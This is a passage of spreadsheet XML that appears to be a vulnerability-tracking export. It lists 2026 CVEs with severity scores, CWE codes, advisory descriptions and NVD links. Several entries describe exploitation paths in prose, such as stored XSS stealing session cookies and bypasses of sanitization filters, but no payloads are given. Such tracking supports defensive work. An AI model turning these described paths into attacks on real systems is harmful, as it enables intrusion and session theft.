      <c r="K5462" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L5462" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.30.9, from 0.31.0 before 0.31.5, and in 0.32.0.rc1 before 0.32.0.rc2, an administrator with landing-page editing privileges can store arbitrary HTML and JavaScript in an HTML content block, which Decidim::ContentBlocks::HtmlCell#html_content renders without sanitization, causing the script to execute in visitors' browsers. This issue is fixed in versions 0.30.9, 0.31.5, and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M5462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45572</t>
        </is>
      </c>
    </row>
    <row r="5463">
      <c r="A5463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49309</t>
        </is>
      </c>
      <c r="C5463" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5463" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5463" s="5" t="inlineStr"/>
      <c r="F5463" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5463" s="5" t="inlineStr"/>
      <c r="H5463" s="5" t="inlineStr"/>
      <c r="I5463" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5463" s="5" t="inlineStr"/>
      <c r="K5463" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="L5463" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the Settings module.
Impact: Successful exploitation of this vulnerability may affect service confidentiality.</t>
        </is>
      </c>
      <c r="M5463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49309</t>
        </is>
      </c>
    </row>
    <row r="5464">
      <c r="A5464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53529</t>
        </is>
      </c>
      <c r="C5464" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5464" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5464" s="5" t="inlineStr"/>
      <c r="F5464" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5464" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5464" s="5" t="inlineStr"/>
      <c r="I5464" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J5464" s="5" t="inlineStr"/>
      <c r="K5464" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5464" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Prior to version 0.10.2, page titles returned by the search API could be rendered as raw HTML in the frontend. A user with editor or administrator permissions could create or modify a page title containing an HTML/JavaScript payload. When another user searched for a matching term, the payload could execute in the victim’s browser. The impact depends on deployment configuration. With `--public-access` enabled, unauthenticated visitors could be affected. In authenticated-only deployments, the issue could be used for cross-user XSS against logged-in users who can access search results. The issue has been fixed in version 0.10.2 by ensuring that author-controlled page titles in search results are not interpreted as raw HTML by the browser while preserving search result highlighting.</t>
        </is>
      </c>
      <c r="M5464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53529</t>
        </is>
      </c>
    </row>
    <row r="5465">
      <c r="A5465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53573</t>
        </is>
      </c>
      <c r="C5465" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5465" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5465" s="5" t="inlineStr"/>
      <c r="F5465" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5465" s="5" t="inlineStr"/>
      <c r="H5465" s="5" t="inlineStr"/>
      <c r="I5465" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5465" s="5" t="inlineStr"/>
      <c r="K5465" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5465" s="5" t="inlineStr">
        <is>
          <t>GeoNetwork is a catalog application to manage spatially referenced resources. From 3.12.0 until 4.2.16 and 4.4.11, unsafe redirect validation in GeonetworkOAuth2LoginAuthenticationFilter and KeycloakAuthenticationProcessingFilter permits an attacker-controlled external redirect after login. This issue is fixed in versions 4.2.16 and 4.4.11.</t>
        </is>
      </c>
      <c r="M5465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53573</t>
        </is>
      </c>
    </row>
    <row r="5466">
      <c r="A5466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54706</t>
        </is>
      </c>
      <c r="C5466" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5466" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5466" s="5" t="inlineStr"/>
      <c r="F5466" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5466" s="5" t="inlineStr"/>
      <c r="H5466" s="5" t="inlineStr"/>
      <c r="I5466" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5466" s="5" t="inlineStr"/>
      <c r="K5466" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L5466" s="5" t="inlineStr">
        <is>
          <t>OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. Prior to 2.6.4, OnionShare CLI/Desktop follows symbolic links in cli/onionshare_cli/web/send_base_mode.py through SendBaseModeWeb.set_file_info() and stream_individual_file(), allowing remote recipients of Share or Website mode to read local files outside the selected directory. This issue is fixed in version 2.6.4.</t>
        </is>
      </c>
      <c r="M5466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54706</t>
        </is>
      </c>
    </row>
    <row r="5467">
      <c r="A5467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55165</t>
        </is>
      </c>
      <c r="C5467" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5467" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5467" s="5" t="inlineStr"/>
      <c r="F5467" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5467" s="5" t="inlineStr"/>
      <c r="H5467" s="5" t="inlineStr"/>
      <c r="I5467" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5467" s="5" t="inlineStr"/>
      <c r="K5467" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L5467" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.2, the JWT verifier in lemur/auth/service.py:130-137 used fetch_token_header to read header_data["alg"] from an unverified token and passed that attacker-controlled value to decode_with_multiple_secrets. PyJWT 2.x rejects alg=none with the configured key, so the flaw is a defense-in-depth gap rather than a direct authentication bypass in the shipped configuration. The unpinned algorithm can become exploitable after an asymmetric-signing migration through algorithm confusion, and it weakens algorithm-based anomaly detection because the token chooses the recorded value. A separate disclosure of LEMUR_TOKEN_SECRET would also permit forged HS256 tokens, although that disclosure is an independent prerequisite. The fix introduces the server-controlled LEMUR_TOKEN_ALGORITHMS allowlist and defaults it to HS256. This issue is fixed in version 1.9.2.</t>
        </is>
      </c>
      <c r="M5467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55165</t>
        </is>
      </c>
    </row>
    <row r="5468">
      <c r="A5468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63220</t>
        </is>
      </c>
      <c r="C5468" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5468" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5468" s="5" t="inlineStr"/>
      <c r="F5468" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5468" s="5" t="inlineStr"/>
      <c r="H5468" s="5" t="inlineStr"/>
      <c r="I5468" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5468" s="5" t="inlineStr"/>
      <c r="K5468" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="L5468" s="5" t="inlineStr">
        <is>
          <t>CodeIgniter is a PHP full-stack web framework. In versions prior to 4.7.4, IncomingRequest::isSecure() trusted the X-Forwarded-Proto and Front-End-Https headers from any incoming request, allowing an attacker could spoof these headers and cause the application to incorrectly treat an HTTP request as secure. This may have impacted applications that rely on isSecure(), force_https(), forceGlobalSecureRequests, or similar logic to enforce HTTPS-only access or make security-sensitive decisions. Exploitability depends on deployment configuration. Applications are most exposed if the backend is reachable directly over HTTP, or if a reverse proxy/load balancer forwards client-supplied forwarding headers without stripping or overwriting them. This issue has been fixed in version 4.7.4.</t>
        </is>
      </c>
      <c r="M5468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63220</t>
        </is>
      </c>
    </row>
    <row r="5469">
      <c r="A5469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67612</t>
        </is>
      </c>
      <c r="C5469" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5469" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5469" s="5" t="inlineStr"/>
      <c r="F5469" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5469" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5469" s="5" t="inlineStr"/>
      <c r="I5469" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J5469" s="5" t="inlineStr"/>
      <c r="K5469" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5469" s="5" t="inlineStr">
        <is>
          <t>OpenEMR through 8.2.0 contains a stored cross-site scripting vulnerability in the patient portal template system that allows authenticated administrators to inject arbitrary HTML and JavaScript by storing malicious payloads through the template save mode, which only filters literal PHP open tags. Attackers can exploit the lack of output encoding at the template retrieval endpoint combined with missing HttpOnly cookie attributes to exfiltrate session tokens via document.cookie access, enabling full session hijacking of any admin, clinician, or portal patient who views a poisoned template.</t>
        </is>
      </c>
      <c r="M5469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67612</t>
        </is>
      </c>
    </row>
    <row r="5470">
      <c r="A5470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67617</t>
        </is>
      </c>
      <c r="C5470" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5470" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5470" s="5" t="inlineStr"/>
      <c r="F5470" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5470" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5470" s="5" t="inlineStr"/>
      <c r="I5470" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J5470" s="5" t="inlineStr"/>
      <c r="K5470" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5470" s="5" t="inlineStr">
        <is>
          <t>Microweber CMS through 2.0.20 contains a stored cross-site scripting vulnerability in the content tagging system that allows admin-authenticated attackers to inject arbitrary JavaScript by submitting malicious payloads via the tag_names parameter of the GET /api/save_content_admin endpoint, bypassing three independent sanitization controls including XSS middleware that ignores GET requests, a strip_unsafe() function that only matches double-quoted onerror attributes, and a titlecase normalizer that passes HTML decimal entity-encoded payloads through unchanged. Attackers can store malicious scripts that execute without user interaction for every visitor to the public blog page and within the admin post editor, enabling session riding through same-origin fetch requests using the CSRF token embedded in the page.</t>
        </is>
      </c>
      <c r="M5470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67617</t>
        </is>
      </c>
    </row>
    <row r="5471">
      <c r="A5471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69474</t>
        </is>
      </c>
      <c r="C5471" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5471" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5471" s="5" t="inlineStr"/>
      <c r="F5471" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G5471" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5471" s="5" t="inlineStr"/>
      <c r="I5471" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5471" s="5" t="inlineStr"/>
      <c r="K5471" s="5" t="inlineStr">
        <is>
          <t>CWE-126, CWE-416</t>
        </is>
      </c>
      <c r="L5471" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Overlay Filter allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M5471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69474</t>
        </is>
      </c>
    </row>
    <row r="5472">
      <c r="A5472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69615</t>
        </is>
      </c>
      <c r="C5472" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5472" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5472" s="5" t="inlineStr"/>
      <c r="F5472" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5472" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H5472" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I5472" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5472" s="5" t="inlineStr"/>
      <c r="K5472" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5472" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M5472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69615</t>
        </is>
      </c>
    </row>
    <row r="5473">
      <c r="A5473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70589</t>
        </is>
      </c>
      <c r="C5473" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5473" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5473" s="5" t="inlineStr"/>
      <c r="F5473" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5473" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H5473" s="5" t="inlineStr"/>
      <c r="I5473" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5473" s="5" t="inlineStr"/>
      <c r="K5473" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5473" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 4.22.0 until 6.54.1, a missing validation check allowed users to redeem subscription offers that were no longer active. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M5473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70589</t>
        </is>
      </c>
    </row>
    <row r="5474">
      <c r="A5474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70590</t>
        </is>
      </c>
      <c r="C5474" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5474" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5474" s="5" t="inlineStr"/>
      <c r="F5474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5474" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H5474" s="5" t="inlineStr"/>
      <c r="I5474" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5474" s="5" t="inlineStr"/>
      <c r="K5474" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5474" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. Prior to 6.54.1, any staff-level user was able to leak the hashed passwords of other staff users through the Ghost Admin API. An offline password-guessing attack against the hashes could lead to account takeover if successful, but Device Verification should have prevented an attacker from logging in with a recovered password. Depending on the database used, leaked hashes may not have had the correct casing for all characters, increasing the difficulty of a password-guessing attack. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M5474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70590</t>
        </is>
      </c>
    </row>
    <row r="5475">
      <c r="A5475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71318</t>
        </is>
      </c>
      <c r="C5475" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5475" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5475" s="5" t="inlineStr"/>
      <c r="F5475" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5475" s="5" t="inlineStr"/>
      <c r="H5475" s="5" t="inlineStr"/>
      <c r="I5475" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5475" s="5" t="inlineStr"/>
      <c r="K5475" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5475" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 3.1.0 until 3.21.10 and 4.5.1, an attacker can supply a top-level `as` prop to the /__nuxt_island/ endpoint and drive dynamic component resolution through &lt;component :is&gt;, resolveDynamicComponent, or h(). This issue is fixed in 3.21.10 and 4.5.1.</t>
        </is>
      </c>
      <c r="M5475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71318</t>
        </is>
      </c>
    </row>
    <row r="5476">
      <c r="A5476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71325</t>
        </is>
      </c>
      <c r="C5476" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5476" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5476" s="5" t="inlineStr"/>
      <c r="F5476" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5476" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H5476" s="5" t="inlineStr"/>
      <c r="I5476" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5476" s="5" t="inlineStr"/>
      <c r="K5476" s="5" t="inlineStr">
        <is>
          <t>CWE-653, CWE-863</t>
        </is>
      </c>
      <c r="L5476" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open-source edge router that makes publishing services a fun and easy experience. Prior to 2.11.54, 3.6.25, and 3.7.10, cross-namespace @kubernetescrd references are not rejected for TraefikService backend references resolved by the service resolver. A tenant confined by RBAC to a single namespace can therefore bind its own router to a TraefikService owned by another namespace and expose or reroute that namespace's backend, defeating the namespace isolation allowCrossNamespace=false is meant to enforce. This issue is fixed in version 2.11.54, 3.6.25, 3.7.10.</t>
        </is>
      </c>
      <c r="M5476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71325</t>
        </is>
      </c>
    </row>
    <row r="5477">
      <c r="A5477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71850</t>
        </is>
      </c>
      <c r="C5477" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5477" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5477" s="5" t="inlineStr"/>
      <c r="F5477" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5477" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5477" s="5" t="inlineStr"/>
      <c r="I5477" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5477" s="5" t="inlineStr"/>
      <c r="K5477" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L5477" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. From 3.8.0 to 4.12.33, memo() from hono/jsx retains the result of a server side render and reuses it for later renders with comparator equal props, and request scoped values read inside the component take no part in that comparison, so a response can contain HTML rendered for another user's request. Components wrapped with memo() are compared by props alone; values read implicitly during rendering, such as JSX Context through createContext() and useContext(), useRequestContext() from hono/jsx-renderer, and getContext() from hono/context-storage, do not participate, and the retained result lives as long as the wrapped component, so it outlives the request that produced it. A user may receive a response containing HTML rendered for another user when both render the same memoized component with comparator equal props on the same warm instance, which may disclose another user's account or profile data, disclose request scoped secrets embedded in HTML such as CSRF tokens, or expose role specific content to users who should not receive it. This issue is fixed in version 4.12.34.</t>
        </is>
      </c>
      <c r="M5477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71850</t>
        </is>
      </c>
    </row>
    <row r="5478">
      <c r="A5478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71852</t>
        </is>
      </c>
      <c r="C5478" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5478" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5478" s="5" t="inlineStr"/>
      <c r="F5478" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5478" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5478" s="5" t="inlineStr"/>
      <c r="I5478" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5478" s="5" t="inlineStr"/>
      <c r="K5478" s="5" t="inlineStr">
        <is>
          <t>CWE-834</t>
        </is>
      </c>
      <c r="L5478" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.15.0, a crafted PDF can cause long runtimes and large memory consumption when pypdf/_font.py function Font._collect_cid_character_widths expands unusually large CID font /W width ranges or excessive width entries during text extraction. This issue is fixed in 6.15.0.</t>
        </is>
      </c>
      <c r="M5478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71852</t>
        </is>
      </c>
    </row>
    <row r="5479">
      <c r="A5479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71870</t>
        </is>
      </c>
      <c r="C5479" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5479" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5479" s="5" t="inlineStr"/>
      <c r="F5479" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5479" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5479" s="5" t="inlineStr"/>
      <c r="I5479" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5479" s="5" t="inlineStr"/>
      <c r="K5479" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L5479" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.15.0, a crafted PDF can cause large memory consumption when pypdf/_cmap.py function parse_bfrange parses unusually large source-code or destination-string tokens in a font /ToUnicode CMap during text extraction. This issue is fixed in 6.15.0.</t>
        </is>
      </c>
      <c r="M5479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71870</t>
        </is>
      </c>
    </row>
    <row r="5480">
      <c r="A5480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72727</t>
        </is>
      </c>
      <c r="C5480" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5480" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5480" s="5" t="inlineStr"/>
      <c r="F5480" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5480" s="5" t="inlineStr"/>
      <c r="H5480" s="5" t="inlineStr"/>
      <c r="I5480" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5480" s="5" t="inlineStr"/>
      <c r="K5480" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5480" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0, a low-privileged user could place crafted content in the moderation review queue that executed stored cross-site scripting when a moderator viewed it on a site with a modified or disabled default Content Security Policy. This issue is fixed in versions 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M5480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72727</t>
        </is>
      </c>
    </row>
    <row r="5481">
      <c r="A5481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75904</t>
        </is>
      </c>
      <c r="C5481" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5481" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5481" s="5" t="inlineStr"/>
      <c r="F5481" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5481" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H5481" s="5" t="inlineStr"/>
      <c r="I5481" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5481" s="5" t="inlineStr"/>
      <c r="K5481" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5481" s="5" t="inlineStr">
        <is>
          <t>libmodplug through 0.8.9.1 contains an out-of-bounds read in pat_smplooped in src/load_pat.cpp. The function validates only the upper bound of its sample index against MAXSMP and then subtracts one before indexing the 191-byte static array pat_loops, so an index of zero reads pat_loops[-1], one byte before the array. The index is the smpno field of a parsed MIDI event, which is initialised to zero and only later overwritten from a program-change parameter, so an event reaching the note test before an instrument is assigned carries zero. A 32-byte MIDI file supplied to the library's public ModPlug_Load entry point drives the path through CSoundFile::Create, CSoundFile::ReadMID, and MID_ReadPatterns to the read. The byte read out of bounds determines whether a note event is treated as looping, so adjacent static storage influences playback state.</t>
        </is>
      </c>
      <c r="M5481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75904</t>
        </is>
      </c>
    </row>
    <row r="5482">
      <c r="A5482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76652</t>
        </is>
      </c>
      <c r="C5482" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5482" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5482" s="5" t="inlineStr"/>
      <c r="F5482" s="5" t="inlineStr"/>
      <c r="G5482" s="5" t="inlineStr"/>
      <c r="H5482" s="5" t="inlineStr"/>
      <c r="I5482" s="5" t="inlineStr">
        <is>
